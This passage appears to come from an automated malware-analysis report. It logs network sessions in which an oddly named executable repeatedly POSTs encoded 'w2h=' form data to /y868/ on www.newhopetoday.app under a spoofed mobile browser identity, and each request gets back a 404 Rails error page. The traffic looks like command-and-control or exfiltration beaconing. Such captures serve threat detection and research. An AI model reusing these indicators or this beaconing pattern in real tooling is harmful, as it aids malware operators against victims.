Oct 15, 2024 09:16:35.979965925 CEST	424	IN	Data Raw: 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 55 6e 69 63 6f 64 65 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 74 Data Ascii: var domainNameUnicode = punycode.ToUnicode( domainName ); document.title = document.title.replace( domainName, domainNameUnicode ); } for ( var i = 0; i < spans.length; i++) { if ( spans[ i ].classNam
Oct 15, 2024 09:16:35.979978085 CEST	916	IN	Data Raw: 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 6e 6f 2d 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 73 5b 20 69 20 5d 2e 73 74 79 6c 65 2e 64 69 73 Data Ascii: spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]\|\|function()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	62042	216.40.34.41	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:16:51.708087921 CEST	682	OUT	POST /y868/ HTTP/1.1 Host: www.newhopetoday.app Accept: / Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 192 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/y868/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 Data Raw: 77 32 68 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 71 6d 61 67 4e 66 54 41 64 45 73 67 6d 4e 4d 34 4d 69 6b 6f 4a 62 6f 64 77 37 55 4f 4f 59 4a 33 69 78 33 78 41 61 7a 59 79 50 75 75 62 59 47 61 4c 73 35 61 73 33 43 2b 2b 6e 78 56 31 72 6e 65 71 4b 57 62 38 41 6e 57 67 6b 76 76 78 43 6d 5a 36 65 66 6b 68 58 52 6c 77 45 35 78 52 56 4d 47 43 58 59 41 32 55 49 39 31 39 4f 73 56 59 65 73 6c 4c 36 6b 6d 46 44 47 34 67 61 6d 63 2f 69 74 4a 57 61 66 68 32 6c 61 66 65 44 66 2b 67 2b 6c 75 65 32 2b 34 41 64 7a 30 47 54 52 37 42 48 44 69 64 69 2f 4d 77 66 43 4a 37 77 5a 5a 6d 42 39 Data Ascii: w2h=yuPu17ZIHkrUqmagNfTAdEsgmNM4MikoJbodw7UOOYJ3ix3xAazYyPuubYGaLs5as3C++nxV1rneqKWb8AnWgkvvxCmZ6efkhXRlwE5xRVMGCXYA2UI919OsVYeslL6kmFDG4gamc/itJWafh2lafeDf+g+lue2+4Adz0GTR7BHDidi/MwfCJ7wZZmB9
Oct 15, 2024 09:16:52.208506107 CEST	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: d3c17fbc-80cd-4d6d-8237-96a5e076e1a7 x-runtime: 0.027190 content-length: 17004 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Oct 15, 2024 09:16:52.208539009 CEST	212	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
Oct 15, 2024 09:16:52.208553076 CEST	1236	IN	Data Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
Oct 15, 2024 09:16:52.208570004 CEST	1236	IN	Data Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
Oct 15, 2024 09:16:52.208581924 CEST	1236	IN	Data Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 79 38 36 Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] "/y868"</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide('Framework-Trace');hide('Full-Trace&#
Oct 15, 2024 09:16:52.208591938 CEST	636	IN	Data Raw: 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 Data Ascii: ace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call'</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call'</a><br>
Oct 15, 2024 09:16:52.208623886 CEST	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
Oct 15, 2024 09:16:52.208636999 CEST	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
Oct 15, 2024 09:16:52.208651066 CEST	1236	IN	Data Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 Data Ascii: d_override.rb:24:in `call'</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
Oct 15, 2024 09:16:52.208662033 CEST	636	IN	Data Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 Data Ascii: r.rb:328:in `block in run'</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <script type="text/javascript"> var traceF
Oct 15, 2024 09:16:52.213709116 CEST	1236	IN	Data Raw: 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 73 65 6c Data Ascii: set.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target; // Change the extracte

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	62043	216.40.34.41	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:16:54.271359921 CEST	706	OUT	POST /y868/ HTTP/1.1 Host: www.newhopetoday.app Accept: / Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/y868/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 Data Raw: 77 32 68 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 72 48 71 67 49 38 37 41 62 6b 73 6a 70 74 4d 34 43 43 6b 53 4a 62 6b 64 77 2b 6b 65 4a 74 5a 33 6a 55 54 78 42 66 54 59 78 50 75 75 50 49 47 44 54 4d 35 45 73 33 50 44 2b 6d 64 56 31 72 7a 65 71 4b 6d 62 38 33 7a 56 69 30 76 36 71 79 6d 62 30 2b 66 6b 68 58 52 6c 77 41 5a 4c 52 56 55 47 43 6b 77 41 6b 68 6b 36 35 64 4f 74 59 49 65 73 68 4c 36 67 6d 46 43 38 34 6c 36 49 63 36 2b 74 4a 54 6d 66 76 48 6c 64 57 65 44 56 68 51 2f 6b 2f 38 72 41 33 44 46 32 2b 33 6a 32 67 67 79 69 6c 38 65 68 64 43 57 5a 63 73 77 2b 65 42 49 56 76 77 39 44 63 46 58 52 4b 6d 6e 4f 61 59 76 75 58 6d 65 62 51 41 3d 3d Data Ascii: w2h=yuPu17ZIHkrUrHqgI87AbksjptM4CCkSJbkdw+keJtZ3jUTxBfTYxPuuPIGDTM5Es3PD+mdV1rzeqKmb83zVi0v6qymb0+fkhXRlwAZLRVUGCkwAkhk65dOtYIeshL6gmFC84l6Ic6+tJTmfvHldWeDVhQ/k/8rA3DF2+3j2ggyil8ehdCWZcsw+eBIVvw9DcFXRKmnOaYvuXmebQA==
Oct 15, 2024 09:16:54.778960943 CEST	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: c1d2363e-b216-499f-98f9-3a3d12834ee0 x-runtime: 0.035442 content-length: 17031 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Oct 15, 2024 09:16:54.778983116 CEST	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Oct 15, 2024 09:16:54.778997898 CEST	424	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Oct 15, 2024 09:16:54.779007912 CEST	1236	IN	Data Raw: 5f 74 61 62 6c 65 20 74 62 6f 64 79 2e 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 Data Ascii: _table tbody.fuzzy_matches { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none;
Oct 15, 2024 09:16:54.779019117 CEST	1236	IN	Data Raw: 63 65 26 23 33 39 3b 29 3b 68 69 64 65 28 26 23 33 39 3b 46 75 6c 6c 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c Data Ascii: ce');hide('Full-Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false
Oct 15, 2024 09:16:54.779028893 CEST	424	IN	Data Raw: 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e Data Ascii: _ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_di
Oct 15, 2024 09:16:54.779042006 CEST	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
Oct 15, 2024 09:16:54.779051065 CEST	212	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code
Oct 15, 2024 09:16:54.779062033 CEST	1236	IN	Data Raw: 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 30 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f Data Ascii: ><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call'</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middlew
Oct 15, 2024 09:16:54.779098988 CEST	1236	IN	Data Raw: 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 32 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 Data Ascii: 5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call'</a><br><a class="trac
Oct 15, 2024 09:16:54.783955097 CEST	1236	IN	Data Raw: 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 72 61 63 65 46 72 61 6d 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 27 74 72 61 63 65 2d 66 72 61 6d Data Ascii: ext/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	62044	216.40.34.41	80	6240	C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 09:16:56.970670938 CEST	1719	OUT	POST /y868/ HTTP/1.1 Host: www.newhopetoday.app Accept: / Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1228 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/y868/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36 Data Raw: 77 32 68 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 72 48 71 67 49 38 37 41 62 6b 73 6a 70 74 4d 34 43 43 6b 53 4a 62 6b 64 77 2b 6b 65 4a 74 52 33 69 69 50 78 41 35 62 59 77 50 75 75 54 34 47 47 54 4d 34 42 73 33 6d 49 2b 6d 41 69 31 70 4c 65 77 72 47 62 36 44 66 56 72 30 76 36 69 53 6d 59 36 65 66 31 68 54 30 73 77 45 31 4c 52 56 55 47 43 69 4d 41 6e 30 49 36 2f 64 4f 73 56 59 65 77 6c 4c 36 59 6d 46 4b 47 34 6c 32 32 63 4a 6d 74 4b 79 57 66 74 31 64 64 4b 4f 44 62 69 51 2b 33 2f 38 6e 6c 33 44 4a 36 2b 33 48 4d 67 6e 47 69 68 62 6e 2f 59 42 4f 6e 4b 2f 49 74 62 6a 63 43 6f 55 52 6e 64 45 47 43 51 44 6a 4b 62 4c 4f 4e 58 6e 54 43 56 4e 79 5a 33 78 65 63 77 67 72 5a 35 65 52 54 39 67 56 4b 2b 55 33 6d 52 74 33 42 56 39 73 75 37 52 6a 33 36 68 4e 43 4e 58 61 71 36 43 35 71 33 4d 4f 44 31 74 7a 77 68 49 38 67 4a 50 64 7a 54 46 64 48 34 57 4b 4e 41 56 31 2b 4c 35 71 36 67 6f 50 2b 64 43 4f 6b 68 51 52 77 53 36 39 72 44 31 51 54 34 58 66 30 6f 7a 6e 6d 51 48 71 41 77 66 51 49 41 6a 39 69 54 43 36 69 4e 79 [TRUNCATED] Data Ascii: w2h=yuPu17ZIHkrUrHqgI87AbksjptM4CCkSJbkdw+keJtR3iiPxA5bYwPuuT4GGTM4Bs3mI+mAi1pLewrGb6DfVr0v6iSmY6ef1hT0swE1LRVUGCiMAn0I6/dOsVYewlL6YmFKG4l22cJmtKyWft1ddKODbiQ+3/8nl3DJ6+3HMgnGihbn/YBOnK/ItbjcCoURndEGCQDjKbLONXnTCVNyZ3xecwgrZ5eRT9gVK+U3mRt3BV9su7Rj36hNCNXaq6C5q3MOD1tzwhI8gJPdzTFdH4WKNAV1+L5q6goP+dCOkhQRwS69rD1QT4Xf0oznmQHqAwfQIAj9iTC6iNyqo1ma/4xil4CHzAQIUop1IAze762C3rcncsdBscRa8nx5xZcrnriawwdq24WaUZSnXzdfhRtbSdnYXopzLLfsgPmfplIJKO49+ElneyXMVKMqNvrLCUiZW1oXCgV3MH1pjveTrUZmzrGzACP/JOQcLUFFoDzHfCgoPNXBp6tk237xP8tce9NGgyKN1LNPlhCgl38j359PhPBjlfA1UdiJvJc/K6CJPnXHSi71Se0umPdWRz2qbLfZzNgMyyP9dMB7JlSng3QR8/WXnNxaP/GG6cb93JDT1HTKLv6Qbm1p2rp6GHG7+RQ1qedaDRs4Eg/Rq0Tmd5UL+/G5QREN1EOXBiaXD546ijV0t8gatvPXgLCkUCwF/h4fetPvtKHPyJvLF7FWpQbjRl9ivcrbqthyZLEKntOSuu4LPbtnhAXttyPAvRNdQ/YlQrelbkIJbo8dDafIvWgXzOrGxsG66WmOABO8phv/Z70RLN++wutC2o5bubGvbXE3eWNpPCIlDDt8sIzb2JTO91DQqCfH6l0wlk1Y1eouIokKu9ndsQc3dMS2zvcIeTNYzybU69QLpbhCI2KQD2jK1lmQzYk0Sdw9QKxU01eX/h5Zgc3l6cl0hpTXBOrdfEljYZrcRwNY88Bm97EGKICbqRRp4beVdoNQ5SureUsuG0de3 [TRUNCATED]
Oct 15, 2024 09:16:57.480428934 CEST	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: d0a6e81b-5e29-415f-a2ab-27489516dbe5 x-runtime: 0.035228 content-length: 18043 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 